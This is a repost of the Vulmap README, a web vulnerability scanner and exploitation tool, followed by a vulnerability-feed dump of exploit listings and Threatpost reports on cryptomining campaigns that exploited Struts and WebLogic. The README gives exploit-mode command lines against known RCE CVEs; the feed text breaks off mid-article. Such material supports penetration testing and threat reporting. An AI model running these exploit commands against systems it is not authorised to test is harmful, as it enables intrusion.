![vulmap](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)

Vulmap is a vulnerability scanning tool for web containers, web servers, web middleware, CMSs and other web applications, and it also has exploitation functions. Testers can use vulmap to detect whether a target has a specific vulnerability, and then use the exploitation function to verify that the vulnerability actually exists.

Vulmap currently has two modes: vulnerability scanning (poc) and exploitation (exp). Select the mode with "-m"; poc is the default. In poc mode it also supports "-f" batch scanning of a target list, "-o" output of results to a file and other options; see [Options](<https://github.com/zhzyker/vulmap/#options>) or run python3 vulmap.py -h. In exp mode the poc check is skipped: the exploit is run directly and its result is reported, which verifies both whether the vulnerability exists and whether it can be exploited.

**Use "-a" to specify the target type and reduce false positives, e.g. "-a solr".**
### Installation
The operating system must have python3; python3.7 or higher is recommended.

* Install dependencies:

```
pip3 install -r requirements.txt
```

* Linux, macOS & Windows:

```
python3 vulmap.py -u http://example.com
```
### Options

```
optional arguments:
  -h, --help              show this help message and exit
  -u URL, --url URL       Target URL (e.g. -u "http://example.com")
  -f FILE, --file FILE    Select a target list file, one URL per line (e.g. -f "/home/user/list.txt")
  -m MODE, --mode MODE    The mode supports "poc" and "exp"; you can omit this option, and enter poc mode by default
  -a APP, --app APP       Specify a web app or cms (e.g. -a "weblogic"). default scan all
  -c CMD, --cmd CMD       Custom RCE vuln command, Other than "netstat -an" and "id" can affect program judgment. default is "netstat -an"
  -v VULN, --vuln VULN    Exploit, Specify the vuln number (e.g. -v "CVE-2020-2729")
  --list                  Displays a list of vulnerabilities that support scanning
  --debug                 Debug mode echo request and responses
  --delay DELAY           Delay check time, default 0s
  --timeout TIMEOUT       Scan timeout time, default 10s
  -o FILE, --output FILE  Text mode export (e.g. -o "result.txt")
```
### Examples
Test all vulnerabilities in poc mode:

```
python3 vulmap.py -u http://example.com
```

For RCE vulns, use the "id" command for the check, because some Linux systems do not have the "netstat -an" command:

```
python3 vulmap.py -u http://example.com -c "id"
```

Check <http://example.com> for struts2 vulns (both forms do the same thing, since poc is the default mode):

```
python3 vulmap.py -u http://example.com -a struts2
python3 vulmap.py -u http://example.com -m poc -a struts2
```

Exploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001> (with or without an explicit "-m exp"):

```
python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729
python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729
```

Batch scan the URLs in list.txt:

```
python3 vulmap.py -f list.txt
```

Export scan results to result.txt:

```
python3 vulmap.py -u http://example.com:7001 -o result.txt
```
### Vulnerability List
The vulnerabilities supported by Vulmap are as follows:

| Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |
|---|---|---|---|---|
| Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |
| Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here |
| Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |
| Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |
| Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |
| Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |
| Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |
| Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |
| Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |
| Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |
| Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |
| Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |
| Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |
| Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |
| Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |
| Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |
| Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |
| Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |
| Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |
| Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |
| Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |
| Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |
| Drupal | CVE-2018-7602 | Y | Y | < 7.59, < 8.5.3 (except 8.4.8) drupalgeddon2 rce |
| Drupal | CVE-2019-6340 | Y | Y | < 8.6.10, drupal core restful remote code execution |
| Jenkins | CVE-2017-1000353 | Y | N | <= 2.56, LTS <= 2.46.1, jenkins-ci remote code execution |
| Jenkins | CVE-2018-1000861 | Y | Y | <= 2.153, LTS <= 2.138.3, remote code execution |
| Nexus OSS/Pro | CVE-2019-7238 | Y | Y | 3.6.2 - 3.14.0, remote code execution vulnerability |
| Nexus OSS/Pro | CVE-2020-10199 | Y | Y | 3.x <= 3.21.1, remote code execution vulnerability |
| Oracle Weblogic | CVE-2014-4210 | Y | N | 10.0.2 - 10.3.6, weblogic ssrf vulnerability |
| Oracle Weblogic | CVE-2017-3506 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.0-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2017-10271 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.1-2, weblogic wls-wsat rce |
| Oracle Weblogic | CVE-2018-2894 | Y | Y | 12.1.3.0, 12.2.1.2-3, deserialization any file upload |
| Oracle Weblogic | CVE-2019-2725 | Y | Y | 10.3.6.0, 12.1.3.0, weblogic wls9-async deserialization rce |
| Oracle Weblogic | CVE-2019-2729 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3 wls9-async deserialization rce |
| Oracle Weblogic | CVE-2020-2551 | Y | N | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
| Oracle Weblogic | CVE-2020-2555 | Y | Y | 3.7.1.17, 12.1.3.0.0, 12.2.1.3-4.0, t3 deserialization rce |
| Oracle Weblogic | CVE-2020-2883 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, iiop t3 deserialization rce |
| Oracle Weblogic | CVE-2020-14882 | Y | Y | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce |
| RedHat JBoss | CVE-2010-0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
| RedHat JBoss | CVE-2010-1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |
| RedHat JBoss | CVE-2015-7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
| ThinkPHP | CVE-2019-9082 | Y | Y | < 3.2.4, thinkphp rememberme deserialization rce |
| ThinkPHP | CVE-2018-20062 | Y | Y | <= 5.0.23, 5.1.31, thinkphp rememberme deserialization rce |
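The support table is more useful as a check inventory once parsed. The following Python is an added example, not code from the vulmap project: it parses the table (either the original `+---+` ASCII layout or a markdown pipe table; the excerpt embedded below is constructed from rows of this README), lists which checks vulmap runs for a given "-a" target type, flags poc-only entries that "-m exp" cannot confirm, and builds the poc-mode command line the README recommends. The "-a" values for weblogic, struts2 and solr are the ones this README shows; mapping any other target type by the last word of its name is an assumption.

```python
"""Turn Vulmap's supported-vulnerability table into a check inventory.

Added example, not code from the vulmap project. SUPPORT_TABLE is a
constructed excerpt of the README table; the "-a" values for Weblogic,
Struts2 and Solr come from the README examples, the rest are assumed.
"""
import shlex
from dataclasses import dataclass
from typing import List, Optional

# Constructed excerpt of the README table (same +---+ layout as the original).
SUPPORT_TABLE = """\
+-----------------+----------------+-----+-----+-------------------------------------------------------------+
| Target type     | Vuln Name      | Poc | Exp | Impact Version && Vulnerability description                 |
+-----------------+----------------+-----+-----+-------------------------------------------------------------+
| Apache Solr     | CVE-2019-0193  | Y   | N   | < 8.2.0, dataimporthandler module remote code execution     |
| Apache Solr     | CVE-2019-17558 | Y   | Y   | 5.0.0 - 8.3.1, velocity response writer rce                 |
| Apache Tomcat   | CVE-2020-1938  | Y   | Y   | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read  |
| Oracle Weblogic | CVE-2020-2551  | Y   | N   | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, wlscore deserialization rce |
| Oracle Weblogic | CVE-2020-14882 | Y   | Y   | 10.3.6.0, 12.1.3.0, 12.2.1.3-4, 14.1.1.0.0, console rce     |
+-----------------+----------------+-----+-----+-------------------------------------------------------------+
"""


@dataclass(frozen=True)
class Check:
    target_type: str
    vuln: str
    has_poc: bool
    has_exp: bool
    description: str


def parse_support_table(text: str) -> List[Check]:
    """Parse the +---+ ASCII table (or a markdown pipe table) into Check records."""
    checks: List[Check] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("|"):
            continue  # +----+ border lines and blank lines carry no data
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 5:
            continue  # malformed row
        if cells[0] == "Target type" or all(set(c) <= {"-", ":"} for c in cells):
            continue  # header row or markdown |---| separator
        target, vuln, poc, exp, desc = cells
        checks.append(Check(target, vuln, poc.upper() == "Y", exp.upper() == "Y", desc))
    return checks


# "-a" values the README shows explicitly; any other target type is mapped by
# the last word of its name, which is an assumption about vulmap's naming.
APP_FLAGS = {"Oracle Weblogic": "weblogic", "Apache Struts2": "struts2", "Apache Solr": "solr"}


def app_flag(target_type: str) -> str:
    return APP_FLAGS.get(target_type, target_type.split()[-1].lower())


def checks_for_app(checks: List[Check], app: str) -> List[Check]:
    """Checks vulmap would run when "-a" is set to this target type."""
    return [c for c in checks if app_flag(c.target_type) == app]


def poc_only(checks: List[Check]) -> List[str]:
    """Vulns with a poc but no exp: a poc hit on these cannot be confirmed with
    "-m exp" and needs a manual or patch-level verification instead."""
    return [c.vuln for c in checks if c.has_poc and not c.has_exp]


def poc_command(url: str, app: str, timeout: int = 10, output: Optional[str] = None) -> str:
    """Build the poc-mode invocation the README recommends: "-a" set to the
    known target type so unrelated checks (and their false positives) are skipped."""
    argv = ["python3", "vulmap.py", "-u", url, "-m", "poc", "-a", app,
            "--timeout", str(timeout)]
    if output:
        argv += ["-o", output]
    return shlex.join(argv)


def target_list(urls: List[str]) -> str:
    """Content for the "-f" file: one URL per line, blanks and duplicates dropped."""
    seen = set()
    kept = []
    for url in (u.strip() for u in urls):
        if url and url not in seen:
            seen.add(url)
            kept.append(url)
    return "".join(f"{u}\n" for u in kept)


if __name__ == "__main__":
    inventory = parse_support_table(SUPPORT_TABLE)
    for check in checks_for_app(inventory, "weblogic"):
        print(check.vuln, "exp" if check.has_exp else "poc-only", "-", check.description)
    print("poc-only entries:", poc_only(inventory))
    print(poc_command("http://example.com:7001", "weblogic", output="result.txt"))
```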
### Docker

```
docker build -t vulmap/vulmap .
docker run --rm -ti vulmap/vulmap python vulmap.py -u https://www.example.com
```

**[Download Vulmap](<https://github.com/zhzyker/vulmap> "Download Vulmap")**
{"githubexploit": [{"lastseen": "2021-12-29T23:35:43", "description": "# CVE-2019-2725\nWebLogic Universal Exploit - CVE-2017-3506 / CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-08-23T01:42:57", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2017-10271", "CVE-2017-3506"], "modified": "2021-12-29T12:52:27", "id": "7BA07704-21CC-5BFC-A0F9-8FDA2BC84402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T18:09:06", "description": "# weblogicPoc\nWeblogic Vuln POC EXP cve-2020-2551 cve-2020-2555...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2020-05-16T03:01:32", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2551", "CVE-2020-2555", "CVE-2020-2883"], "modified": "2022-03-30T14:19:43", "id": "94095106-8E25-54E1-924C-2C3B4E99610F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:32:49", "description": "# drupal8-REST-RCE\nCVE-2019-6340 drupal8-REST-RCE (/node/1) , CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-08-31T22:55:18", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Drupal", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-6340", "CVE-2018-7600"], "modified": "2020-11-24T15:41:16", "id": "0B0F940B-BBCE-52B1-8A3F-6FF63D7BDA4E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:22", "description": "<h1 align=\"center\" >Welcome to CodeTest</h1>\n\n### :point_right:\u5173...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-30T01:55:52", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-14882"], "modified": "2021-11-14T02:41:21", "id": "504A0052-A0EB-53EA-AFC3-4E5EEC236795", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T03:59:32", "description": "```\nweblogic CVE-2019-2725 CVE-2019...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-24T08:33:07", "type": "githubexploit", "title": "Exploit for Injection in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729"], "modified": "2022-03-23T01:26:21", "id": "4F4AF4AC-0953-5098-98D6-592B918B0836", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:10:36", "description": "# CVE-2020-10199\r\n\r\n\u56de\u663e\u7248\u672c \u968f\u624b\u5199\u7684\u672a\u6d4b\u8bd5bug...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-15T06:12:51", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Sonatype Nexus", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10199"], "modified": "2022-06-20T08:12:01", "id": "2C8634AE-CCCD-5AFC-94A7-D1742433840C", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "privateArea": 1}], "threatpost": [{"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). 
That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. 
In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). 
That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. 
There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. 
So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. 
\u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past year. For instance, in January 2019, Talos researchers saw Panda exploiting a recently-disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942). And in June 2019, Panda began to target a newer WebLogic vulnerability (CVE-2019-2725) and leveraging an updated payload with new features to download a secondary miner payload.\n\nIn the most recent campaigns, including one which took place in August 2019, Panda began employing a different set of command-and-control (C2) servers as well as a new payload-hosting infrastructure.\n\nIn March 2019, for instance, researchers observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. And in August, researchers said they observed several attacker IPs, post-exploit, pulling down payloads from a newer URL and saving the file as \u201cBBBBB\u201d (a slight departure from previous behavior, when the file was saved under a random 20-character name). 